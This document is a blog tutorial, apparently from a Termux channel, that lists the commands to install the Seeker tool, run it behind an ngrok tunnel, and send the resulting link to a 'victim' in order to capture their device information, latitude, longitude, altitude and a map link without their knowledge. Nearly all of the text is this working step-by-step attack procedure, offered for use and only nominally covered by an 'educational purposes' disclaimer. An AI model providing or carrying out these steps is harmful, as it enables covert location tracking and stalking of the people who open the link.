Commands For Install and Use Seeker Tool In Termux. Find Exact Location By Termux.

Hello guys, today I am going to show you about how to find exact location of any person by just sending link with the help of seeker tool in termux. Just follow my steps.

Requirements

1. Python3

2. ngrok

How To Install And Setup ngrok In Termux.

Step : 1 

First install and configure ngrok server in your termux. If you don't know how to do that watch video from below.

 

Step : 2

Turn on hotspot from your mobile then start ngrok http server on port 8080 by this command.

./ngrok http 8080

Then copy forwarding address of ngrok server.

Install Seeker Tool In Termux.

Step : 3

After configure ngrok open new session in your termux then type following commands one by one. Don't do spelling mistake while typing command.

pkg up -y

pkg install python -y

pkg install php -y

pkg install openssh -y

pkg install git -y

git clone https://github.com/thewhiteh4t/seeker

cd seeker

pip install requests

python seeker.py -t manual

Now choose near you template by typing '0'. Make sure your ngrok server started. Page has been created.

Step : 4

Now send link to victim which you have copied early from ngrok forwarding.

When victim open link you will get following information of your victim.

  • Device Information
  • Lattitude
  • Longitude
  • Altitude
  • Google Map Location Link.

This tutorial is only for educational purposes. Don't use this method for harm any person. I am not responsible for any illegal activity done by you.

Subscribe Us On YouTube :

www.youtube.com/c/TermuxProfessorYT

If you are facing error while installing any tool tell us on our Telegram Group

Post a Comment

3 Comments